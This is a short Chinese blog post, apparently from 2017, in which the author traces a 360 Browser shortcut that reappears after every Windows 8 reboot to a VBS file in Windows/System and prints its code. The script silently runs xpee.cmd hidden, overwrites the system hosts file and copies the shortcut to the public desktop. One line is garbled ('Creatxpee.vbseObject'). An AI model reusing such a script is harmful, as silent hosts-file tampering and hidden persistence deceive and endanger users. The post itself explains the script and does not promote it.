Loading

xpee.vbs

xpee.vbs

 Win 8安装之后每一次重启桌面都会有一个360浏览器的快捷方式,终于找到原因了,

在Windows/System下面有这么个文件;

 

Set ws = CreateObject("Wscript.Shell") 
ws.run "cmd /c xpee.cmd",vbhide
Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile("C:\WINDOWS\system\hosts")
MyFile.Copy ("C:\WINDOWS\system32\drivers\etc\hosts")

Set fso = Creatxpee.vbseObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile("C:\WINDOWS\system\360安全浏览器7.lnk")
MyFile.Copy ("C:\Users\Public\Desktop\360安全浏览器7.lnk")

 

posted @ 2017-05-13 06:00  stono  阅读(1096)  评论(0编辑  收藏  举报